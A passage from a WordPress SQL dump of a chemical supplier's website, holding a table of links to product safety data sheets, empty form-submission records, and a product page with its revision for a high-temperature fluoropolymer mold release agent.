href="https://www.miller-stephenson.com/wp-content/uploads/sds/8132.pdf">EPON RESIN 8132</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730.pdf">MS-730M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3200MD.pdf">MS-32XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT960.pdf">Vydax NRT 960</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VPFXP.pdf">VACUUM PUMP FLUID XP</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8280.pdf">EPON RESIN 8280</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730L.pdf">MS-730L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XP35.pdf">X-P35</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA5.pdf">RA/IPA-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHT500AF.pdf">XHT-500AF</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8281.pdf">EPON RESIN 8281</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805B.pdf">H0805B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA15.pdf">RA/IPA-15</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHToils.pdf">XHT-OILS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58005.pdf">EPON RESIN 58005</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H1112B.pdf">H1112B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA.pdf">DryFilm RA/IPA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTAC.pdf">XHT-AC, ACX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58034.pdf">EPON RESIN 58034</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/745.pdf">MS-745</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSDG.pdf">Vertrel SDG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RA.pdf">DryFilm RA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/XHT-BD-series.pdf">XHT BD, BDZ, BDX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1510.pdf">EPONEX 1510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSFR.pdf">Vertrel SFR</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-RED-16.pdf">MS-143TE Red</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTS.pdf">XHT-S, SX, SZ</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/WD510.pdf">EPI-REZ WD-510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750M</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/485G-16.pdf">MS-48G RFI Nickel</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-1.0-16.pdf">MS-143TE-1.0</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL2E.pdf">GPL 2E SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3522W60.pdf">EPI-REZ 3522-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/114D-17.pdf">MS-114D </a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.0-16.pdf">MS-143TE-2.0</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/fluoroguard.pdf">PCA,PRO,SG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5003W55.pdf">EPI-REZ 5003-W-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.5-16.pdf">MS-143TE-2.5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5520W60.pdf">EPI-REZ 5520-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755L.pdf">MS-755L</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-5-16.pdf">MS-143TE-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5522WY55.pdf">EPI-REZ 5522-WY-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-10-16.pdf">MS-143TE-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3015.pdf">EPIKURE 3015</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-82-16.pdf">ReleaSys 82</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3046.pdf">EPIKURE 3046</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/765.pdf">MS-765</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-85-16.pdf">ReleaSys 85</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3055.pdf">EPIKURE 3055</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-88-16.pdf">ReleaSys 88</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3115.pdf">EPIKURE 3115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-89-16.pdf">ReleaSys 89</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/04/3125.pdf">EPIKURE 3125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8200-16.pdf">ReleaSys 8200</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/3140-1.pdf">EPIKURE 3140</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8500-16.pdf">ReleaSys 8500</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3155.pdf">EPIKURE 3155</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8800-16.pdf">ReleaSys 8800</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3164.pdf">EPIKURE 3164</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8900-16.pdf">ReleaSys 8900</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3223.pdf">EPIKURE 3223</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122AVL-16.pdf">MS-122AVL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3234.pdf">EPIKURE 3234</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122SEL-16.pdf">MS-122SEL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3245.pdf">EPIKURE 3245</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/110XN-16.pdf">MS-110XN</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-BLUE-16.pdf">MS-143TE Blue</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3253.pdf">EPIKURE 3253</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120X.pdf">MS-120X</a></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3270.pdf">EPIKURE 3270</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120XXP.pdf">MS-120X-XP</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3271.pdf">EPIKURE 3271</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805A.pdf">H0805A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3274.pdf">EPIKURE 3274</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/J0912A.pdf">J0912A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3282.pdf">EPIKURE 3282</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K0725A.pdf">K0725A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3290.pdf">EPIKURE 3290</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1016A.pdf">K1016A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3295.pdf">EPIKURE 3295</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/530N-17.pdf">MS-530N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/W.pdf">CURING AGENT W</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/532N-16.pdf">MS-532N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K54.pdf">ANCAMINE K54</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/538N-17.pdf">MS-538N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K61B.pdf">ANCAMINE K61B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/539N-16.pdf">MS-539N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BDMA.pdf">BDMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/550N-16.pdf">MS-550N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BF3400.PDF">BF3-400</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/552N-16.pdf">MS-552N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/DEAPA.pdf">DEAPA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/580N-16.pdf">MS-580N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NMA.pdf">NMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/582N-16.pdf">MS-582N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V115.pdf">VERSAMID 115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/747-16.pdf">MS-747</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V125.pdf">VERSAMID 125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V140.pdf">VERSAMID 140</a></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2017-06-16 17:39:23', '2017-06-16 17:39:23', '', 1842, 'https://www.miller-stephenson.com/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4602, 0, '2017-06-18 22:14:15', '2017-06-18 22:14:15', '', '', '', 'publish', 'closed', 'closed', '', '4602', '', '', '2017-06-18 22:14:15', '2017-06-18 22:14:15', '', 0, 'https://www.miller-stephenson.com/nf_sub/4602/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4603, 0, '2017-06-19 07:48:57', '2017-06-19 07:48:57', '', '', '', 'publish', 'closed', 'closed', '', '4603', '', '', '2017-06-19 07:48:57', '2017-06-19 07:48:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/4603/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4604, 0, '2017-06-19 13:20:36', '2017-06-19 13:20:36', '', '', '', 'publish', 'closed', 'closed', '', '4604', '', '', '2017-06-19 13:20:36', '2017-06-19 13:20:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/4604/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4605, 0, '2017-06-19 13:57:19', '2017-06-19 13:57:19', '', '', '', 'publish', 'closed', 'closed', '', '4605', '', '', '2017-06-19 13:57:20', '2017-06-19 13:57:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/4605/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4606, 0, '2017-06-19 14:05:34', '2017-06-19 14:05:34', '', '', '', 'publish', 'closed', 'closed', '', '4606', '', '', '2017-06-19 14:05:35', '2017-06-19 14:05:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/4606/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4607, 3, '2017-06-19 18:42:36', '2017-06-19 18:42:36', '<h2>ReleaSys™ HTF | High Temperature Mold Release</h2>\r\n<h3>Advanced DryFilm Chemistry; Ideal for High-Temperature Composites; High Lubricity</h3>\r\nReleaSys™ HTF High Temperature Mold Release is a highly advanced, water-based release agent designed to exhibit exceptional release of all substrates from room temperature up to 750° F.  ReleaSys HTF develops a highly lubricious and dry film on the mold surface, offering extended reapplication intervals and no costly transfer. Designed to meet the demands of the advanced composite and elastomer manufacturing industries, this high temperature mold release utilizes sophisticated fluoropolymer technology required for process that require long cure times at elevated temperatures. ReleaSys HTF are designed for all high performance substrates used in compression molding, resin transfer, rubber / elastomer vulcanization, vacuum bagging, filament-winding, mandrel-built, hand and spray layup processes. Benefits include:\r\n<ul>\r\n 	<li>Exceptional Lubricity and Ease of Release</li>\r\n 	<li>Ideal for Advanced Composites and Elastomers</li>\r\n 	<li>Heat Stable to 750 ° F</li>\r\n 	<li>Numerous Releases per Application</li>\r\n 	<li>Water-based; No VOC; no odor</li>\r\n</ul>\r\n<h3>Miller-Stephenson Specializes in the Development of High Temperature Mold Release Solutions</h3>\r\nReleaSys™ HTF was developed to provide a highly lubricious, non-transferring, high temperature mold release agent for modern composite and elastomer operations. Today\'s modern molding industies are running shorter, hotter cycles while also requiring extended reapplication intervals from their mold release.  ReleaSys HTF was refined and optimized for these exact parameters. Miller-Stephenson\'s proprietary fluoropolymer release agent binds tenaciously to the mold surface providing efficient resin flow, increases part quality, no transfer, and exceptional durability.  This translates to a cost-effective mold release agent which increases throughput, minimizes scrap rates, and eliminates the need for any post-molding cleaning. The advanced chemistry within ReleaSys HTF holds tremendous utility and applicators will see the immediate effects:\r\n<ul>\r\n 	<li>Molded parts can be post-painted or glued with little or no surface preparation</li>\r\n 	<li>Decreased cost of scrap and waste.</li>\r\n 	<li>Reduced frequency of equipment maintenance and replacement</li>\r\n 	<li>Ability to restore and extend the life of your equipment</li>\r\n 	<li>Improved mold integrity, surface quality and throughput</li>\r\n 	<li>Low product application levels result in a cleaner working environment</li>\r\n</ul>\r\n<h3>50+ years of Industry Expertise at your service</h3>\r\nMiller-Stephenson has had a long history in composite molding industries, and our ReleaSys brand of products are respected around the world for quality and reliability. When you purchase Miller-Stephenon ReleaSys Semi-Permanent mold release agents you not only get industry leading products, you also gain access to our many years of direct production floor experience. We understand your production issues and can help you optimize your mold preparation, maintenance and release processes to improve your bottom line.\r\n\r\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a>\r\n\r\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">Click here for information, Which mold release agent is right for you</a></strong>', 'ReleaSys™ HTF | High Temperature Mold Release', 'ReleaSys™ HTF is a highly advanced, water-based release agent designed to exhibit exceptional release of all substrates from room temperature up to 750° F. This product develops a highly lubricious and dry film on the mold surface, offering extended reapplication intervals and no costly transfer. Designed to meet the demands of the advanced composite and elastomer manufacturing industries, this high temperature mold release utilizes sophisticated fluoropolymer technology.\r\n<ul>\r\n 	<li>Exceptional Lubricity and Ease of Release</li>\r\n 	<li>Ideal for Advanced Composites and Elastomers</li>\r\n 	<li>Heat Stable to 750 ° F</li>\r\n 	<li>Numerous Releases per Application</li>\r\n 	<li>Water-based; No VOC; no odor</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'high-temperature-mold-release', '', '', '2017-06-19 19:01:51', '2017-06-19 19:01:51', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=4607', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (4608, 3, '2017-06-19 18:11:04', '2017-06-19 18:11:04', 'Designed for aerospace, rubber / elastomer molding at high temperature molding. mold release agent', 'high temperature mold release', 'ReleaSys HTF mold release agent', 'inherit', 'closed', 'closed', '', 'shutterstock_596377658', '', '', '2017-06-19 18:11:57', '2017-06-19 18:11:57', '', 4607, 'https://www.miller-stephenson.com/wp-content/uploads/2017/06/shutterstock_596377658.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4609, 3, '2017-06-19 19:01:48', '2017-06-19 19:01:48', '<h2>ReleaSys™ HTF | High Temperature Mold Release</h2>\n<h3>Advanced DryFilm Chemistry; Ideal for High-Temperature Composites; High Lubricity</h3>\nReleaSys™ HTF High Temperature Mold Release is a highly advanced, water-based release agent designed to exhibit exceptional release of all substrates from room temperature up to 750° F.  ReleaSys HTF develops a highly lubricious and dry film on the mold surface, offering extended reapplication intervals and no costly transfer. Designed to meet the demands of the advanced composite and elastomer manufacturing industries, this high temperature mold release utilizes sophisticated fluoropolymer technology required for process that require long cure times at elevated temperatures. ReleaSys HTF are designed for all high performance substrates used in compression molding, resin transfer, rubber / elastomer vulcanization, vacuum bagging, filament-winding, mandrel-built, hand and spray layup processes. Benefits include:\n<ul>\n 	<li>Exceptional Lubricity and Ease of Release</li>\n 	<li>Ideal for Advanced Composites and Elastomers</li>\n 	<li>Heat Stable to 750 ° F</li>\n 	<li>Numerous Releases per Application</li>\n 	<li>Water-based; No VOC; no odor</li>\n</ul>\n<h3>Miller-Stephenson Specializes in the Development of High Temperature Mold Release Solutions</h3>\nReleaSys™ HTF was developed to provide a highly lubricious, non-transferring, high temperature mold release agent for modern composite and elastomer operations. Today\'s modern molding industies are running shorter, hotter cycles while also requiring extended reapplication intervals from their mold release.  ReleaSys HTF was refined and optimized for these exact parameters. Miller-Stephenson\'s proprietary fluoropolymer release agent binds tenaciously to the mold surface providing efficient resin flow, increases part quality, no transfer, and exceptional durability.  This translates to a cost-effective mold release agent which increases throughput, minimizes scrap rates, and eliminates the need for any post-molding cleaning. The advanced chemistry within ReleaSys HTF holds tremendous utility and applicators will see the immediate effects:\n<ul>\n 	<li>Molded parts can be post-painted or glued with little or no surface preparation</li>\n 	<li>Decreased cost of scrap and waste.</li>\n 	<li>Reduced frequency of equipment maintenance and replacement</li>\n 	<li>Ability to restore and extend the life of your equipment</li>\n 	<li>Improved mold integrity, surface quality and throughput</li>\n 	<li>Low product application levels result in a cleaner working environment</li>\n</ul>\n<h3>50+ years of Industry Expertise at your service</h3>\nMiller-Stephenson has had a long history in composite molding industries, and our ReleaSys brand of products are respected around the world for quality and reliability. When you purchase Miller-Stephenon ReleaSys Semi-Permanent mold release agents you not only get industry leading products, you also gain access to our many years of direct production floor experience. We understand your production issues and can help you optimize your mold preparation, maintenance and release processes to improve your bottom line.\n\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a>\n\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">Click here for information, Which mold release agent is right for you</a></strong>', 'ReleaSys™ HTF | High Temperature Mold Release', 'ReleaSys HTF is a highly advanced, water-based release agent designed to exhibit exceptional release of all substrates from room temperature up to 750° F. This product develops a highly lubricious and dry film on the mold surface, offering extended reapplication intervals and no costly transfer. Designed to meet the demands of the advanced composite and elastomer manufacturing industries, this high temperature mold release utilizes sophisticated fluoropolymer technology.\n<ul>\n 	<li>Exceptional Lubricity and Ease of Release</li>\n 	<li>Ideal for Advanced Composites and Elastomers</li>\n 	<li>Heat Stable to 750 ° F</li>\n 	<li>Numerous Releases per Application</li>\n 	<li>Water-based; No VOC; no odor</li>\n</ul>', 'inherit', 'closed', 'closed', '', '4607-autosave-v1', '', '', '2017-06-19 19:01:48', '2017-06-19 19:01:48', '', 4607, 'https://www.miller-stephenson.com/4607-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4610, 0, '2017-06-19 22:02:24', '2017-06-19 22:02:24', '', '', '', 'publish', 'closed', 'closed', '', '4610', '', '', '2017-06-19 22:02:25', '2017-06-19 22:02:25', '', 0, 'https://www.miller-stephenson.com/nf_sub/4610/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4611, 0, '2017-06-20 07:25:47', '2017-06-20 07:25:47', '', '', '', 'publish', 'closed', 'closed', '', '4611', '', '', '2017-06-20 07:25:47', '2017-06-20 07:25:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/4611/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4612, 0, '2017-06-20 07:26:10', '2017-06-20 07:26:10', '', '', '', 'publish', 'closed', 'closed', '', '4612', '', '', '2017-06-20 07:26:11', '2017-06-20 07:26:11', '', 0, 'https://www.miller-stephenson.com/nf_sub/4612/', 0, 'nf_sub', '', 0); 
